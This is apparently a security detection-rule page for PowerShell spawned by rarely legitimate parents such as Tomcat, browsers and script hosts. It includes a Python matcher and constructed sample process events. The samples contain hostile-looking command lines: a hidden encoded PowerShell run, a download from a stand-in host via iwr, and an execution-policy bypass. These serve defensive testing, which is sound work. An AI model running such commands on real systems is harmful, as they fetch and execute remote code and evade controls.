
Summary
This detection rule identifies suspicious PowerShell executions based on their parent process. It targets instances where PowerShell is launched by a parent that rarely spawns it legitimately, which may indicate abuse of a legitimate tool to execute a malicious payload. The rule uses Windows process creation logs to pinpoint such activity. Detection combines two conditions: the parent image must match a list of processes known to be rarely associated with PowerShell (for example 'tomcat', various web browsers, and certain system utilities), and the child must be identifiable as PowerShell by its executable name or by command line parameters that invoke it. The rule therefore examines both the parent image and the characteristics of the PowerShell instance itself. A level of high is assigned because improper PowerShell usage is frequently linked to a range of attacks, including malicious script execution and lateral movement within an environment. False positives may arise from legitimate scripts that interact with commonly used applications.
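The two-part match described above (a rare parent image plus a child that is recognisably PowerShell), run over a handful of constructed Sysmon-style process creation events. This is an added illustration written for this page, not the rule's own logic or its real parent list: the parent names, the `OriginalFileName` check for renamed binaries and the `/c powershell` command line marker are assumptions chosen to show each way the page says PowerShell can be identified.

```python
import ntpath

# Illustrative parent list (assumed for this example). The page names tomcat,
# web browsers and system utilities; the actual rule's list may differ.
SUSPICIOUS_PARENTS = {
    "tomcat.exe", "tomcat8.exe", "tomcat9.exe",
    "chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe",
}

# Ways to recognise the child as PowerShell (assumed for this example):
# by image name, by the PE's original file name (catches a renamed binary),
# or by a command line that hands off to PowerShell via cmd.exe /c.
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
POWERSHELL_ORIGINAL_NAMES = {"powershell.exe", "pwsh.dll"}
POWERSHELL_CMDLINE_MARKERS = ("/c powershell", "/c pwsh")


def _basename(path):
    """Lower-cased file name of a Windows path ('' if the field is missing)."""
    return ntpath.basename(path or "").lower()


def looks_like_powershell(event):
    """True if the created process is PowerShell by any of the three signals."""
    if _basename(event.get("Image")) in POWERSHELL_IMAGES:
        return True
    if (event.get("OriginalFileName") or "").lower() in POWERSHELL_ORIGINAL_NAMES:
        return True
    cmdline = (event.get("CommandLine") or "").lower()
    return any(marker in cmdline for marker in POWERSHELL_CMDLINE_MARKERS)


def has_suspicious_parent(event):
    """True if the parent is one that rarely spawns PowerShell legitimately."""
    parent = _basename(event.get("ParentImage"))
    if not parent:
        # No parent information: the rule cannot be evaluated, so do not alert.
        return False
    return parent in SUSPICIOUS_PARENTS or parent.startswith("tomcat")


def matches(event):
    """The rule fires only when both conditions hold."""
    return looks_like_powershell(event) and has_suspicious_parent(event)


def scan(events):
    """Return the ids of events that trigger the rule."""
    return [e["id"] for e in events if matches(e)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # browser spawning an encoded PowerShell command: should fire
        "id": "evt-1",
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA",
    },
    {   # ordinary interactive use from Explorer: common parent, should not fire
        "id": "evt-2",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe",
    },
    {   # Tomcat spawning cmd.exe that hands off to PowerShell: the Image is
        # cmd.exe, so only the command line marker identifies it. Should fire.
        "id": "evt-3",
        "ParentImage": r"C:\tomcat9\bin\tomcat9.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": 'cmd.exe /c powershell -nop -c "iwr http://example.invalid/a"',
    },
    {   # renamed PowerShell binary launched by a browser: only the
        # OriginalFileName reveals it. Should fire.
        "id": "evt-4",
        "ParentImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "Image": r"C:\Users\Public\update.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "update.exe -ep bypass -f C:\\Users\\Public\\s.ps1",
    },
    {   # event with no parent recorded: cannot be evaluated, should not fire
        "id": "evt-5",
        "ParentImage": None,
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "OriginalFileName": "pwsh.dll",
        "CommandLine": "pwsh.exe -File deploy.ps1",
    },
]

if __name__ == "__main__":
    print("alerts:", scan(SAMPLE_EVENTS))  # → alerts: ['evt-1', 'evt-3', 'evt-4']
```

The `OriginalFileName` signal is what makes the rule resilient to an attacker copying `powershell.exe` under another name, and the command line marker covers the common `cmd.exe /c powershell ...` hand-off where the child image alone would be missed; both are worth keeping in any port of this logic to a query language. The explicit handling of a missing parent field is a design choice: an event without parent data cannot satisfy the rule, so it is skipped rather than treated as suspicious.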
Categories
- Endpoint
- Windows
Data Sources
- Process
Created: 2020-03-20